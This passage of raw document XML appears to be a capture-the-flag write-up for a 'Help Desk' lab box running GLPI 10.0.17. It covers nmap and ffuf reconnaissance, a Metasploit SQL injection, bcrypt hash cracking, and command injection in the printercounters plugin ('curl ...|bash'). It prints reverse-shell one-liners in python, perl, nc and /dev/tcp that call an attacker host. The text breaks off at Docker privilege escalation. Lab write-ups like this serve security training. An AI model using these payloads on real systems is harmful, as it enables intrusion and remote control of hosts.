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23hlzzbnfiww"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both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.aabqkkuly6md" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>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5">
      <w:pPr>
        <w:jc w:val="cente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0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Help Desk</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7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.dfi5sh6xkf5n" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">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Initially, we will verify the active ports and services in the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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172.16.1.244 4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ALL-TCP-HELPDESK</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0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Starting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7.94SVN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https://nmap.org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2025-04-18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10:55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0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172.16.1.244</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0D">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(0.14s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latency).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0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65532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tcp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0F">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10">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22/tcp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ssh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11">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80/tcp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12">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8080/tcp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http-proxy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13">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146.62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seconds</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previously identified ports and services, we proceed to check versions and gather additional information using Nmap.</w:t>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-p22,80,8080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-sVC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172.16.1.244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Services-TCP-HELPDESK</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Starting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7.94SVN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https://nmap.org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2025-04-18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172.16.1.244</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(0.15s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latency).</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22/tcp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OpenSSH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9.6p1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Ubuntu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3ubuntu13.8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(Ubuntu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Linux;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protocol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ssh-hostkey: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1f:10:28:13:20:a1:8a:ab:0f:d4:56:26:bb:72:66:13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(ECDSA)</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24:b5:78:c8:56:c7:d9:d3:b1:ab:8a:98:03:8b:65:62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(ED25519)</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80/tcp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Apache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2.4.58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((Ubuntu))</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|_http-title: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Technical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Solution</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|_http-server-header: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Apache/2.4.58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(Ubuntu)</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8080/tcp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Apache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2.4.62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((Debian))</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http-open-proxy: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Potentially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proxy.</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|_Methods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supported:CONNECTION</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|_http-server-header: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Apache/2.4.62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(Debian)</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|_http-title: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Authentication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GLPI</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Linux;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cpe:/o:linux:linux_kernel</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Please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https://nmap.org/submit/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28.79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seconds</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">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simplify name resolution, we add the domain directly to the hosts file.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'172.16.1.244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helpdesk.hc'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/etc/hosts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HTTP service on port 80, we encounter the following homepage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5667375" cy="2689916"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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667375" cy="268991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homepage analysis reveals static content with no apparent dynamic functionality. We proceed with file and directory enumeration to identify potential hidden content.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ffuf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/usr/share/wordlists/diretorios-web-wordlist.txt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http://helpdesk.hc/FUZZ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v2.1.0-dev</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________________________________________________</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Method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http://helpdesk.hc/FUZZ</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FUZZ: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/usr/share/wordlists/diretorios-web-wordlist.txt</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Calibration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200-299,301,302,307,401,403,405,500</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________________________________________________</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29549,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11191,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670ms]</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.htaccess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144ms]</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145ms]</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.htpasswd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145ms]</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index.html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29549,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11191,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146ms]</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server-status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143ms]</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[89621/89621]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req/sec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[0:05:33]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 accessible files or directories were identified that could be exploited to continue the attack chain.</w:t>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HTTP service on port 8080, we encounter the following homepage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5662613" cy="3475610"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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662613" cy="347561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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The application requires valid credentials, and attempts with default credentials were unsuccessful. Therefore, we proceed with enumeration of hidden files and directories to identify potential access vectors.</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ffuf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/usr/share/wordlists/diretorios-web-wordlist.txt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http://helpdesk.hc:8080/FUZZ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v2.1.0-dev</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________________________________________________</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Method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http://helpdesk.hc:8080/FUZZ</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FUZZ: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/usr/share/wordlists/diretorios-web-wordlist.txt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Calibration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200-299,301,302,307,401,403,405,500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________________________________________________</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.htaccess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144ms]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.htpasswd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144ms]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145ms]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10166,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3288,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3891ms]</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LICENSE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35148,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5836,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674,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146ms]</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ajax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144ms]</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144ms]</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config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145ms]</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148ms]</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144ms]</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front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145ms]</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145ms]</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index.php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10166,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3288,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189ms]</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152ms]</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144ms]</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144ms]</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locales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145ms]</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marketplace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144ms]</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146ms]</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plugins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145ms]</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10243,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3288,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204ms]</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145ms]</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server-status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145ms]</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145ms]</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src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145ms]</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templates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145ms]</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vendor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145ms]</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145ms]</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[89621/89621]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req/sec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[0:05:52]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1">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no useful files or directories were identified for exploitation, the next step is to determine the version of the GLPI application in use.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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5795963" cy="1523298"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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95963" cy="152329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identifying the version, we perform a Google search for known vulnerabilities associated with the service. We use the dork: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">glpi 10.0.17 exploit.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> From the search results, we arrive at the following article:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
            <w:color w:val="188038"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.lexfo.fr/glpi-sql-to-rce.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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conducted several tests based on the referenced article using Burp Suite, but we did not obtain the same results. While investigating in the Metasploit Framework, we identified a specific module for this vulnerability. After configuring the required parameters and executing the module, the vulnerability was confirmed on the target host. We wait for the execution to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5662613" cy="2069031"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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662613" cy="206903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40" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After successful exploit execution, we obtained password hashes of users registered in the application.</w:t>
      </w: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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">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glpi_users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api_token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Plugin_ELPI_Inventory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glpi</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$2y$10$fucVSHUcQT...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glpi-system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normal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">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$2y$10$DzpsWVk6/E...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post-only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2">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$2y$10$rh.xhQiCT8...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$2y$10$6XAeLVTMDw...</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3">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4">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Auxiliary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During testing with default GLPI users, we identified that only the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘glpi’ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user was active. We extracted the corresponding hash and prepared a file for use with Hashcat in order to crack the password.</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-w=/usr/share/wordlists/rockyou.txt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hash-glpi1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--format=bcrypt</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UTF-8</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Loaded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(bcrypt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[Blowfish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32/64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X3])</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1024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hashes</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threads</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Ctrl-C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PASSWORD_HERE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0:00:00:09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(2025-04-18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12:56)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0.1097g/s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37.54p/s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37.54c/s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37.54C/s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strawberry..ihateyou</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display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cracked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reliably</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B2">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3">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that we successfully cracked the glpi user hash, we validate the credential by authenticating into the application.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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5691188" cy="2626702"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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691188" cy="262670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6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.2qnouon68uur" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation – obtaining the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At this point, we attempt to achieve Remote Code Execution (RCE) using the method described in the referenced article. Initially, we capture the plugin request as mentioned in the article, then send a curl request to validate communication between hosts.</w:t>
      </w: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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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/plugins/printercounters/ajax/process.php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HTTP/1.1</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helpdesk.hc:8080</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Content-Length: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58</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X-Requested-With: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XMLHttpRequest</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Accept-Language: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en-US,en;q=0.9</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Accept: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text/html,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q=0.01</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X-Glpi-Csrf-Token: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c95e95fc9d6159f5518f6a88f46ef36546b502314b1e3574e49c6daead58f86b</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Content-Type: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application/x-www-form-urlencoded;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charset=UTF-8</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User-Agent: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Mozilla/5.0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(Windows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Win64;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x64)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AppleWebKit/537.36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(KHTML,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Gecko)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Chrome/130.0.6723.70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Safari/537.36</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Origin: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http://helpdesk.hc:8080</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Referer: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http://helpdesk.hc:8080/plugins/printercounters/front/config.form.php</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Accept-Encoding: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gzip,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Cookie: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glpi_8a3b8c36c63440d18cee792876d37eab=e6f6b2484ec4f28949ddf254d9b9c29b;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glpi_8a3b8c36c63440d18cee792876d37eab_rememberme=%5B2%2C%22F43724QsYzltjbvWG1kfuXLFbwkORayeHoOWklxW%22%5D</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Connection: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keep-alive</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action=killProcess&amp;items_id=1231231';curl+10.0.15.12/aaaa;#</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">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request to port 80, we receive a response confirming successful communication with the attacker host.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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5643563" cy="1303066"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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643563" cy="130306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that RCE is confirmed and communication with our attack host is established, we can deliver a file to obtain a reverse shell. For this, we use the website</w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://reverse-shell.sh/</w:t>
        </w:r>
      </w:hyperlink>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tl w:val="0"/>
        </w:rPr>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Reverse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https://github.com/lukechilds/reverse-shell</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machine:</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1337</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machine:</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https://reverse-shell.sh/yourip:1337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dick</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python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2&gt;&amp;1;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python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socket,subprocess,os;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s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);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s.connect(("10.0.15.12",443));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os.dup2(s.fileno(),0);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os.dup2(s.fileno(),1);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os.dup2(s.fileno(),2);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p=subprocess.call(["/bin/sh","-i"]);'</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exit;</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2&gt;&amp;1;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perl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Socket;$i="10.0.15.12";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh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exit;</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2&gt;&amp;1;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/tmp/f;mkfifo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/tmp/f;cat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/tmp/f|/bin/sh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2&gt;&amp;1|nc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10.0.15.12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443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&gt;/tmp/f</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exit;</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2&gt;&amp;1;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/bin/sh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/dev/tcp/10.0.15.12/443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0&gt;&amp;1</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exit;</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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payload file properly created, we use Burp Suite to send the request responsible for downloading and executing the script on the target host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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/plugins/printercounters/ajax/process.php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HTTP/1.1</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helpdesk.hc:8080</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Content-Length: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59</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X-Requested-With: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XMLHttpRequest</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Accept-Language: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en-US,en;q=0.9</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Accept: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text/html,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q=0.01</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X-Glpi-Csrf-Token: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c95e95fc9d6159f5518f6a88f46ef36546b502314b1e3574e49c6daead58f86b</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Content-Type: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application/x-www-form-urlencoded;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charset=UTF-8</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User-Agent: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Mozilla/5.0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(Windows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Win64;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x64)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AppleWebKit/537.36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(KHTML,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Gecko)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Chrome/130.0.6723.70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Safari/537.36</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Origin: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http://helpdesk.hc:8080</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Referer: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http://helpdesk.hc:8080/plugins/printercounters/front/config.form.php</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Accept-Encoding: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gzip,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Cookie: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glpi_8a3b8c36c63440d18cee792876d37eab=e6f6b2484ec4f28949ddf254d9b9c29b;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glpi_8a3b8c36c63440d18cee792876d37eab_rememberme=%5B2%2C%22F43724QsYzltjbvWG1kfuXLFbwkORayeHoOWklxW%22%5D</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Connection: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keep-alive</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action=killProcess&amp;items_id=1231231';curl+10.0.15.12/shell|bash;#</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">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Once executed, we obtain a reverse connection to the environment.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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5748338" cy="2164839"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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48338" cy="216483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Note: For the reverse connection, we used the Penelope script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
            <w:color w:val="188038"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/brightio/penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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interactive access to the host, we proceed to locate our first piece of evidence inside the root (/) directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5757863" cy="3580209"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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57863" cy="358020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manual analysis, we identify that we are inside a Docker container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.kxbkd8rjh1wa" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation – obtaining the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To continue the exploitation process, it is necessary to escalate privileges and obtain root access. Only with elevated privileges will it be possible to escape the Docker environment to the host. For this purpose, we use the CDK tool.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
